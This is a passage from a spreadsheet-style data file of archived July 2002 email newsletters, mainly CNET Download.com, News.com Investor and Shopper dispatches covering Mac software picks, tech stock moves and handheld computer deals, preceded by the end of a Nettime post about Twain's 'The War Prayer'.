Source of Love, and Who is the ever-faithful refuge and friend of all that are sore beset and seek His aid with humble and contrite hearts. Amen." Twain wrote the story, "The War Prayer," in 1905 during the American occupation of the Philippines, but the story wasn't printed until 1923, thirteen years after his death, because the editors thought it "unsuitable" for publication at the time it was written. #  distributed via : no commercial use without permission #   is a moderated mailing list for net criticism, #  collaborative text filtering and cultural politics of the nets #  more info: majordomo@bbs.thing.net and "info nettime-l" in the msg body #  archive: [URL]http://www.nettime.org[/URL] contact: nettime@bbs.thing.net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www.nettime.org</t>
  </si>
  <si>
    <t>CHE</t>
  </si>
  <si>
    <t>To: qqqqqqqqqq-zdnet@example.com\nFrom: "CNET Download.com for Mac" &lt;Online#3.20230.ac-q5A1l6tzmmPhUdRR.1@newsletter.online.com&gt;\nDate: Tue, 16 Jul 2002 20:04:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Tue, 16 Jul 2002 20:04:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>"CNET Download.com for Mac" &lt;Online#3.20230.ac-q5A1l6tzmmPhUdRR.1@newsletter.online.com&gt;</t>
  </si>
  <si>
    <t>This week: Marine Aquarium, QuickTime, MoonDock</t>
  </si>
  <si>
    <t>CNET | DOWNLOAD DISPATCH(Mac Edition) July 16, 2002 Vol. 7, No. 28 A Screen Dream Good Mac screensavers are hard to come by. And screensavers are important: not only do they preserve your screen quality, but they can also turn your monitor into a conversation piece. Marine Aquarium, our Pick of the Week, will turn your desktop into a virtual tropical fish aquarium that will make your Mac turn some heads. No need to feed: [URL]http://clickthru.online.com[/URL]  Also this week, we've got QuickTime 6, the media player's long- awaited first foray into MPEG-4 technology; Cartoon Editor, a graphic editor that will help you make QuickTime cartoons; MoonDock, so you can keep track of moon phases on your desktop; WebDesign, a full-featured HTML editor with lots of extras; and Sigma Chess Lite, so you can challenge your mind and develop your skills at the ancient game of chess. Enjoy! Jason Parker Assistant Editor, CNET Download.com -- (Unsubscribe instructions are at the bottom of this newsletter.) &lt;---------------Advertisement---------------&gt; Gateway High Performance Desktops - starting at $699! High Performance, the 500 Series goes beyond the basics and features some of the latest technology.  With new sleek platinum cases, systems include Intel(R) Pentium(R) 4 processors, USB 2.0 support, Mid-Tower chassis, Broadband Ready and Microsoft(R) Windows(R)XP.  Click here for details! [URL]http://clickthru.online.com[/URL]  &lt;-------------------------------------------&gt; IN THIS ISSUE: 1. This Week's Top 10 Downloads 2. Pick of the Week: Marine Aquarium 3. The Week in Wares:               - Multimedia and design: QuickTime, Cartoon Editor               - Home and education: MoonDock               - Development tools: WebDesign               - Games: Sigma Chess Lite 4. Updates &amp; Drivers 5. The Week in Reviews: A TiVo-like toy for the Mac? 6. Overheard on Download.com 7. Download.com Outage Notice P.S. Got a suggestion for CNET Download.com? Send it to: suggestions@download.com _____________________________________________________________ 1. This Week's Top 10 Downloads    1. LimeWire 2.4.4                         6,190 downloads    2. LimeWire (OS X) 2.4.4                  4,561 downloads    3. MacSatellite  1.6.1                    4,313 downloads    4. Hotline Connect Client 1.8.5           3,656 downloads    5. RealPlayer 8.0                         2,939 downloads    6. Deck 3.5                               2,908 downloads    7. Fetch 4.0.1                            2,333 downloads    8. Internet Explorer 5.1.4                2,229 downloads    9. Marine Aquarium 0.99.0                 1,837 downloads   10. Internet Explorer (OS X) 5.2.1         1,820 downloads For more details on Download.com's most popular files, click here: [URL]http://clickthru.online.com[/URL]  ______________________________________________________________ 2. Pick of the Week    MARINE AQUARIUM    Version: 0.99.0    File size: 3MB    License: Free to try; $12.95 to buy    Minimum Requirements: Mac OS X    As the name suggests, this program puts an incredibly    realistic aquarium of saltwater fish on your screen. You can    select from a variety of highly textured fish to swim across    your desktop, and you can control variables such as lighting    and the number of fish. There is even a starfish that you can    track over time to watch how it adapts to its environment.    [URL]http://clickthru.online.com[/URL]     Want to review Marine Aquarium? Submit your opinion here:    [URL]http://clickthru.online.com[/URL]     Find all of our Picks here:    [URL]http://clickthru.online.com[/URL]  ______________________________________________________________ 3. The Week in Wares    IN MULTIMEDIA AND DESIGN:    QUICKTIME    Version 6.0    File size: 402K    License: Free    Minimum requirements: Mac OS 8.6/9.x or Mac OS X    The latest version of Apple's premiere media application    supports the increasingly popular MPEG-4 codec for high-    quality, highly compressed video, as well as modern formats    such as AAC (Advanced Audio Codec) and JPEG 2000. It also    provides skip protection, an enhanced user interface with a    more intuitive and useful Favorites menu, new developer APIs,    and other useful features such as support for Flash 5 files.    [URL]http://clickthru.online.com[/URL]     Want to review QuickTime? Submit your opinion here:    [URL]http://clickthru.online.com[/URL]     CARTOON EDITOR    Version: 1.2.1    File size: 2.38MB    License: Free    Minimum requirements: Mac OS X    Cartoon Editor won't turn you into a gifted cartoonist    overnight. But what this graphic editor will do is make quick    work of creating short QuickTime movies and animated GIFs--    and for OS X freeware, it doesn't get much better than that.    Cartoon Editor lets you draw or import JPEGs and GIFs, which    you can then manipulate with a set of tools that lets you    group, scale, duplicate, ghost, and all sorts of other useful    cartoony things. The program's Java2D foundation allows for    some surprisingly powerful features, like gradients,    antialiasing, splining, and transparencies.    [URL]http://clickthru.online.com[/URL]     Want to review Cartoon Editor? Submit your opinion here:    [URL]http://clickthru.online.com[/URL]     Find all of the latest multimedia and design software here:    [URL]http://clickthru.online.com[/URL]     IN HOME AND EDUCATION:    MOONDOCK    Version: 1.2.2    File size: 1.95MB    License: Free    Minimum Requirements: Mac OS X    Get in touch with the natural rhythms of our solar system    with MoonDock, a simple piece of software that tracks the    phases of the moon for you and displays lovely images of our    planet's companion satellite on your desktop. The images are    high-quality color photos that change over time in accordance    with the date. MoonDock includes both astronomical and survey    data, meaning that you can calculate the appropriate moon    phase for a particular date and identify topographical    features on the moon using a built-in catalog of those that    have been surveyed by astronomers and astronauts. This update    incorporates improved help features and a few bug fixes.    [URL]http://clickthru.online.com[/URL]     Want to review MoonDock? Submit your opinion here:    [URL]http://clickthru.online.com[/URL]     Find all of the latest home and education software here:    [URL]http://clickthru.online.com[/URL]     IN DEVELOPMENT TOOLS:    WEBDESIGN    Version: 1.6    File size: 1.5MB    License: Free to try; $28.95 to buy    Minimum Requirements: Mac OS 9.x through Mac OS X 10.1.5    Web designers have an array of software choices, from writing    straight code in something like SimpleText to automating    everything via drag-and-drop programs that keep HTML at arm's    length. WebDesign offers a happy medium, with a significant    number of nice extras. You can drag-and-drop from menus or    edit your syntax line by line; build image maps and forms    with relative ease; and work with a full selection of tools    for site-wide color scheme changes, text manipulation, and    localization. WebDesign supports both HTML and XHTML, along    with JavaScript, tabs, and Cascading Style Sheets. This new    version lets you view your designs as they will be seen with    various browsers, and has more stable editing and FTP tools.    [URL]http://clickthru.online.com[/URL]     Want to review WebDesign? Submit your opinion here:    [URL]http://clickthru.online.com[/URL]     Find all of the latest development tools here:    [URL]http://clickthru.online.com[/URL]     IN GAMES:    SIGMA CHESS LITE    Version: 6.01    File size: 2.94MB    License: Free    Minimum Requirements: System 7.x    Put your mind to the test with this customizable chess game.    Sigma is OS X-native and lets you develop your skills through    levels with adjustable difficulty and customizable pieces and    boards. What's more, Sigma offers advanced features such as    printing functions, player rankings, and the ability to    record and collect your matches.    [URL]http://clickthru.online.com[/URL]     Want to review Sigma Chess Lite? Submit your opinion here:    [URL]http://clickthru.online.com[/URL]     Find all of the latest games here:    [URL]http://clickthru.online.com[/URL]  ______________________________________________________________ 4. Updates &amp; Drivers: Stay on Top of Bug Fixes and New Features    IN INTERNET:    - Internet Explorer (OS X) 5.2.1      [URL]http://clickthru.online.com[/URL]     - mDialog 1.5      [URL]http://clickthru.online.com[/URL]     - Email Magician 1.9      [URL]http://clickthru.online.com[/URL]     IN MULTIMEDIA &amp; DESIGN:    - Audacity 1.0      [URL]http://clickthru.online.com[/URL]     - Audion 3.0      [URL]http://clickthru.online.com[/URL]     - Audion (OS X) 3.0      [URL]http://clickthru.online.com[/URL]     IN UTILITIES:    - MacAnalysis 2.2.1      [URL]http://clickthru.online.com[/URL]     - SpeedRun 1.1      [URL]http://clickthru.online.com[/URL]     - DockFun! 3 preview 1      [URL]http://clickthru.online.com[/URL]     IN BUSINESS AND FINANCE:    - OmniGraffle (OS X) 2.0.5      [URL]http://clickthru.online.com[/URL]     - Sambucus 2.0.1      [URL]http://clickthru.online.com[/URL]     IN HOME AND EDUCATION:    - Blues Music 1.0      [URL]http://clickthru.online.com[/URL]     - Dramatica Pro 4.0      [URL]http://clickthru.online.com[/URL]     - iNotePad 1.6.1      [URL]http://clickthru.online.com[/URL]  _______________________________________________________________ 5. The Week in Reviews:    A TiVo-like toy for the Mac?    A Macintosh software company plans to launch Monday the first    consumer personal video recorder for Mac aficionados.    [URL]http://clickthru.online.com[/URL]  _______________________________________________________________ 6. Overheard on Download.com    Here are some user comments about a Mac game that takes you    back to the days of hanging out at the arcade:    "Cool!"    "An arcade classic!!!"    "Great fun without violence!"    "Addicting!!!!"    "Excelente"    So what's the name of this mystery download? Click here to    find out:    [URL]http://clickthru.online.com[/URL]  _______________________________________________________________ The e-mail address for your subscription is qqqqqqqqqq-zdnet@example.com To sign up for more CNET newsletters, click here: [URL]http://nl.com.com[/URL] To unsubscribe, click here: [URL]http://clickthru.online.com[/URL] To receive your newsletter in HTML format, click here: [URL]http://nl.com.com[/URL] For the CNET Newsletters FAQ, click here: [URL]http://clickthru.online.com[/URL]  To learn about advertising opportunities in CNET Newsletters, click here: [URL]http://clickthru.online.com[/URL]  Copyright 2002 CNET Networks, Inc. All rights reserved.</t>
  </si>
  <si>
    <t>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clickthru.online.com http://nl.com.com http://clickthru.online.com http://nl.com.com http://clickthru.online.com http://clickthru.online.com</t>
  </si>
  <si>
    <t>To: qqqqqqqqqq-zdnet@example.com\nFrom: "CNET News.com Investor" &lt;Online#3.20216.56-c0AXgilV9YMFp9RR.1@newsletter.online.com&gt;\nDate: Tue, 16 Jul 2002 14:19:05 -0700 (PDT)</t>
  </si>
  <si>
    <t>Tue, 16 Jul 2002 14:19:05 -0700 (PDT)</t>
  </si>
  <si>
    <t>"CNET News.com Investor" &lt;Online#3.20216.56-c0AXgilV9YMFp9RR.1@newsletter.online.com&gt;</t>
  </si>
  <si>
    <t>NEWS.COM INVESTOR: Techs slump with Intel</t>
  </si>
  <si>
    <t>\n\n![CNET Investor Dispatch]([URL]http://www.cnet.com[/URL]  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n  \n|  |  **Quote Lookup**  \nEnter symbol:  \n  \n* Symbol Lookup  \nQuotes delayed 20+ minutes  \n---  \n  \n![Investor Sections]([URL]http://www.cnet.com[/URL]  \nÂ• **My Portfolio**  \nÂ• **Broker Reports**  \nÂ• **IPOs**  \nÂ• **Splits**  \nÂ• **Messages**\n\n![Tech Winners]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://home.cnet.com[/URL]  | NXTP | 4.42 | 36.42%  \n---|---|---|---  \n![]([URL]http://home.cnet.com[/URL]  | NXTL | 6.53 | 30.60%  \n![]([URL]http://home.cnet.com[/URL]  | GENU | 2.77 | 28.84%  \n![]([URL]http://home.cnet.com[/URL]  | BINX | 3.9 | 25.81%  \n![]([URL]http://home.cnet.com[/URL]  | CYCL | 2.759 |\n23.67%  \n  \n![Tech Losers]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://home.cnet.com[/URL]  | ASGN | 9.0 |\n-38.48%  \n---|---|---|---  \n![]([URL]http://home.cnet.com[/URL]  | PLUM | 3.2 |\n-28.87%  \n![]([URL]http://home.cnet.com[/URL]  | QFAB | 9.92 |\n-28.53%  \n![]([URL]http://home.cnet.com[/URL]  | SONT | 2.16 |\n-26.28%  \n![]([URL]http://home.cnet.com[/URL]  | RAZFD | 3.511 |\n-13.09%  \n  \n![Also from\nCNET]([URL]http://home.cnet.com[/URL]  \n**Live tech help NOW!\n\nApril's tech award\n\n1 million open jobs\n\nNews.com: Top CIOs\n\nZDNet: PeopleSoft **  \n---  \n  \n![]([URL]http://www.cnet.com[/URL]  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] |  | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]  \nJuly 16, 2002  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n![]([URL]http://home.cnet.com[/URL] DJIA  \n8473.11  -166.08 | ![]([URL]http://home.cnet.com[/URL]\nNASDAQ  \n1375.26  -7.36 | ![]([URL]http://home.cnet.com[/URL] S&amp;P;\n500  \n900.94  -16.99 | ![]([URL]http://home.cnet.com[/URL] CNET\nTECH  \n992.91  -12.40  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n  \n![]([URL]http://www.cnet.com[/URL]  \n---  \n**Techs slump with Intel**  \nWith investors selling Intel shares before its post-market close earnings\nannouncement, technology stocks dropped Tuesday.\n\nDespite generally upbeat remarks on the economy by Fed Chair Alan Greenspan\nand news of a profitable quarter from Nextel Communications, CNET's Tech index\nslipped 12.4 points, or 1.25 percent, to 992.91. The tech-laden Nasdaq\ncomposite index fell 7.36 points, or 0.53 percent, to 1,375.26.\n\nWorse-than-expected earnings from construction machinery maker Caterpillar\nhelped depress broader markets. The Dow Jones industrial average lost 166.0\npoints, or 1.92 percent, to 8,473.1--for its seventh consecutive losing\nsession. The S&amp;P; 500 shed 16.99 points, or 1.85 percent, to 900.94--another\nmulti-year low.  \n  \n![]([URL]http://www.cnet.com[/URL]  \n| ![Top Investor News]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]  \n---|---  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n**Microsoft reveals media XP details**  \nMicrosoft on Tuesday gave an official name to an upcoming version of Windows\nXP that aims to make the PC a permanent part of the home entertainment center.\nOriginally code-named Freestyle, this entertainment version of Windows--which\nwill go by the name Windows XP Media Center Edition--will appear on new PCs\nand PC hybrids in time for the holidays, the company revealed on Tuesday. With\nWindows Media Center, consumers will be able to use a TV remote control to\ncatalog songs, videos and pictures, as well as check TV listings.  \n **MICROSOFT CORP 51.25 -1.06%**\n\n**Intel layoffs possible**  \nChipmaker Intel may be on the verge of announcing massive layoffs or other\ncuts amid a slow market for personal computers, according to reports. Intel\nCEO Craig Barrett is scheduled to speak to employees after stock markets close\nTuesday, according to The Wall Street Journal. At about the same time, the\nchipmaker will discuss its second-quarter results on a conference call with\nanalysts.  \n **INTEL CORP 18.36 -3.97%**\n\n**Nextel Turns Profitable, Revenues Jump**  \nNextel Communications Inc., the nation's No. 5 wireless telephone company, on\nTuesday said it turned profitable in its second quarter, driven by strong\ncustomer demand that translated to a 25 percent revenue increase. Nextel also\nsaid it expected 2002 operating cash flow of at least $3 billion compared with\nan earlier forecast calling for $2.5 billion.  \n **NEXTEL COMMUNIC'NS'A' 6.53 30.6%**\n\n**Also from CNET**  \n![]([URL]http://www.cnet.com[/URL]  \n---  \n![]([URL]http://www.cnet.com[/URL]  \nReal-time stock quotes from CNET News.com Investor.  \n30-day free trial!\n\n![Today's Broker Reports]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]  \n---|---  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n**Banc of America Securities begins coverage of Power Integrations with a\n"market performer" rating in tech notes 7/16/02**  \nAnalyst Douglas Lee says the maker of power supply integrated circuits is\nbuilding a market niche with a more efficient and reliable technology than\ntraditional approaches to converting AC-to-DC power supplies. He also notes\nPower Integrations is expanding its market with DC-to-DC power supply\nproducts, and says the firm's growth is based on converting today's power\nsupplies to its more efficient technologies. As a result, the company doesn't\nneed a boost in end-market demand to grow, Lee says. Although he sees a large,\nuntapped market for Power Integrations and likes its long-term prospects, Lee\nsuggests the stock is fairly valued. He believes shares of POWI are unlikely\nto rise much in the short term.  \n **POWER INTEGRATIONS 18.72 5.23%**  \nVisit the Brokerage Center\n\n![CEO Wealth Meter]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]  \n---|---  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n**French TV exec says Vivendi tapped him for CFO**  \nA French television executive said on Tuesday he had been approached about\ntaking over as finance chief at beleaguered media giant Vivendi Universal --\nand acknowledged the job would be a "challenge." Jacques Espinasse, chief\noperating officer at French satellite TV consortium TPS, has been cited by the\nFrench press as a candidate for the financial hot seat at Vivendi, which is\ngrappling with cash and debt problems in the wake of the sacking earlier this\nmonth of chairman Jean-Marie Messier.  \n **VIVENDI UNIVERSAL 15.38 -5.06%**  \nVisit the CEO Wealth Meter  \n\n  \n  \n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]  \n---|---|---|---|---  \n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]  \n![Crucial Clicks]([URL]http://www.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL]  \n---  \n![]([URL]http://home.cnet.com[/URL] | ![]([URL]http://home.cnet.com[/URL] |\n![]([URL]http://home.cnet.com[/URL] | ![]([URL]http://home.cnet.com[/URL] |\n![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://a.r.tv.com[/URL] |\n![]([URL]http://home.cnet.com[/URL] | **Digital photography starter kit**  \nThis guide to digital photos will show you the best products to take your\nimages from snap to finish.  \n---|---|---  \n![]([URL]http://home.cnet.com[/URL]  \nÂ• Panasonic's littlest Lumix  \nÂ• Minolta"s 4-megapixel Dimage F100  \n  \n![]([URL]http://home.cnet.com[/URL] |  | ![]([URL]http://home.cnet.com[/URL]  \n---  \n![]([URL]http://home.cnet.com[/URL] | ![]([URL]http://home.cnet.com[/URL] |\n![]([URL]http://home.cnet.com[/URL]  \n**Most popular products**  \n![]([URL]http://home.cnet.com[/URL]  \n**Digital cameras**  \n![]([URL]http://home.cnet.com[/URL]  \n1\. Canon PowerShot G2  \n![]([URL]http://home.cnet.com[/URL]  \n2\. Canon PowerShot S30  \n![]([URL]http://home.cnet.com[/URL]  \n3\. Canon PowerShot S40  \n![]([URL]http://home.cnet.com[/URL]  \n4\. Canon PowerShot A40  \n![]([URL]http://home.cnet.com[/URL]  \n5\. Sony Cyber Shot DSC-F707  \n![]([URL]http://home.cnet.com[/URL]  \n![]([URL]http://a.r.tv.com[/URL] **See all most popular\ncameras**  \n![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL] | ![]([URL]http://home.cnet.com[/URL]  \n![]([URL]http://home.cnet.com[/URL]  \n![]([URL]http://home.cnet.com[/URL]  \n![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]  \n---|---|---|---|---  \n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]  \n| **NEW!** CNET professional e-mail publishing for just $24.95/month. **FREE\nfor 30 days. Click here!**  \n---  \n  \n![Sign up for more free newsletters from\nCNET!]([URL]http://a.r.tv.com[/URL]  \nThe e-mail address for your subscription is qqqqqqqqqq-zdnet@example.com\n\nUnsubscribe | Manage My Subscriptions | FAQ | Advertise\n\nPlease send any questions, comments, or concerns to dispatchfeedback@news.com.  \n![]([URL]http://www.zdnet.com[/URL] ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]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26&amp;ISSUE=2002-07-16)  \n  \n---|---  \n.  \n![]([URL]http://clickthru.online.com[/URL]\n\n</t>
  </si>
  <si>
    <t>http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://www.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://home.cnet.com http://home.cnet.com http://home.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cnet-newsletters@example.com\nFrom: CNET Shopper Newsletter Alerts &lt;Online#3.20211.ca-blhDlX-_RLpCVsRR.1@newsletter.online.com&gt;\nDate: Tue, 16 Jul 2002 13:22:36 -0700 (PDT)</t>
  </si>
  <si>
    <t>Tue, 16 Jul 2002 13:22:36 -0700 (PDT)</t>
  </si>
  <si>
    <t>CNET Shopper Newsletter Alerts &lt;Online#3.20211.ca-blhDlX-_RLpCVsRR.1@newsletter.online.com&gt;</t>
  </si>
  <si>
    <t>Save an extra $50 of Compaq's powerful iPaq H3835! (CNET SHOPPER)</t>
  </si>
  <si>
    <t>![CNET Shopper Newsletter\nAlerts]([URL]http://www.cnet.com[/URL]  \n|  ![]([URL]http://home.cnet.com[/URL]  \n|  ![]([URL]http://home.cnet.com[/URL]  \n|  ![]([URL]http://home.cnet.com[/URL]  \n  \n---|---|---  \n![]([URL]http://home.cnet.com[/URL]  \n|  ![]([URL]http://home.cnet.com[/URL]  \n|  ![]([URL]http://home.cnet.com[/URL]  \n|  ![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://www.cnet.com[/URL]  \n|  \n---  \n  \n![]([URL]http://i.i.com.com[/URL]\n![]([URL]http://www.techrepublic.com[/URL]\n\n  \n![Most Popular]([URL]http://home.cnet.com[/URL]  \n1 | Canon PowerShot S40  \n  \n---|---  \n2 | Canon PowerShot G2  \n  \n3 | Gateway 600XL  \n  \n4 | Dell Latitude C400  \n  \n5 | Cyber Shot DSC-F707  \n  \n![]([URL]http://www.cnet.com[/URL]  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |  |  |  |\n![]([URL]http://www.cnet.com[/URL]  \n---  \n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL]  \nJuly 16, 2002 | ![]([URL]http://www.cnet.com[/URL] | **From\nComputers4Sure**  \nSave an extra $50 of Compaq's powerful iPaq H3835  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL] | **From buy.com**  \nBreak free from convention with Sharp's Linux-powered Zaurus SL-5500!  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n---  \n![]([URL]http://www.cnet.com[/URL]  \n---  \n  \n\n**Computers4Sure** |\n\n![]([URL]http://shopper.cnet.com[/URL]  \n  \n---|---  \n![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]  \n---  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://shopper.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] |  **Sony CLIE PEG-NR70V**  \nÂ• Free shipping  \nÂ• Built-in digital camera/MP3  \nÂ• Built-in keyboard/color display  \n   **Just $599**  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://shopper.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] |  **Compaq iPaq H3835**  \nÂ• $50 rebate  \nÂ• Expandable Pocket PC  \nÂ• 64 MB, brilliant TFT screen  \n   **Just $549 after rebate**  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://shopper.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] |  **Handspring Treo 90**  \nÂ• Free shipping  \nÂ• Vivid color screen/keyboard  \nÂ• 16MB of memory/Palm OS 4.1  \n   **Just $299**  \n![]([URL]http://www.cnet.com[/URL]  \n  \n  \n\n**buy.com** |\n\n![]([URL]http://shopper.cnet.com[/URL]  \n  \n---|---  \n![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]  \n---  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://shopper.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] |  **Palm m515**  \nÂ• Free shipping  \nÂ• 16MB, Palm OS v4.1  \nÂ• MultiMediaCard slot  \n   **Just $395**  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://shopper.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] |  **Sharp Zaurus SL-5500**  \nÂ• Free shipping  \nÂ• 64MB, 3.5-in 65,536 color LCD  \nÂ• CompactFlash and SD expansion  \n   **Just $398**  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://shopper.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] |  **Compaq iPaq H3850**  \nÂ• Free shipping  \nÂ• 64MB RAM, 65K color TFT  \nÂ• 206MHz Intel StrongARM, USB  \n   **Just $549**  \n![]([URL]http://www.cnet.com[/URL]  \n  \n  \n  \n  \n  \n  \n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]  \n---|---|---|---|---  \n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL]  \n---|---|---|---|---|---  \n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] |  ![Sign up for more free newsletters from\nCNET!]([URL]http://a.r.tv.com[/URL]  \nThe e-mail address for your subscription is qqqqqqqqqq-cnet-\nnewsletters@example.com\n\nUnsubscribe |  Manage My Subscriptions  | FAQ |  Advertise  \n![]([URL]http://www.zdnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]  \n---|---|---|---|---|---|---|---  \n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL]  \n---|---|---|---  \n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] |  | ![]([URL]http://www.cnet.com[/URL]  \n---|---|---|---|---  \n![]([URL]http://www.cnet.com[/URL]  \n---  \n|\n\n  \n**Copyright 2002 CNET Networks, Inc. All rights reserved.**\n\n|\n\n![](http://gserv-\ncnet.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136487&amp;NL=e443&amp;ISSUE=2002-07-16)  \n  \n---|---  \n.  \n![]([URL]http://clickthru.online.com[/URL]\n\n</t>
  </si>
  <si>
    <t>http://www.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://www.cnet.com http://i.i.com.com http://www.techrepublic.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shopper.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://shopper.cnet.com http://www.cnet.com http://www.cnet.com http://shopper.cnet.com http://www.cnet.com http://www.cnet.com http://shopper.cnet.com http://www.cnet.com http://www.cnet.com http://shopper.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://shopper.cnet.com http://www.cnet.com http://www.cnet.com http://shopper.cnet.com http://www.cnet.com http://www.cnet.com http://shopper.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www.cnet.com http://clickthru.online.com</t>
  </si>
  <si>
    <t>To: qqqqqqqqqq-zdnet@example.com\nFrom: "CNET News.com Daily Dispatch" &lt;Online#3.20207.9d-Vzezlg_fmMczoRRR.1@newsletter.online.com&gt;\nDate: Tue, 16 Jul 2002 13:01:54 -0700 (PDT)</t>
  </si>
  <si>
    <t>Tue, 16 Jul 2002 13:01:54 -0700 (PDT)</t>
  </si>
  <si>
    <t>"CNET News.com Daily Dispatch" &lt;Online#3.20207.9d-Vzezlg_fmMczoRRR.1@newsletter.online.com&gt;</t>
  </si>
  <si>
    <t>CNET NEWS.COM: Microsoft reveals media XP details</t>
  </si>
  <si>
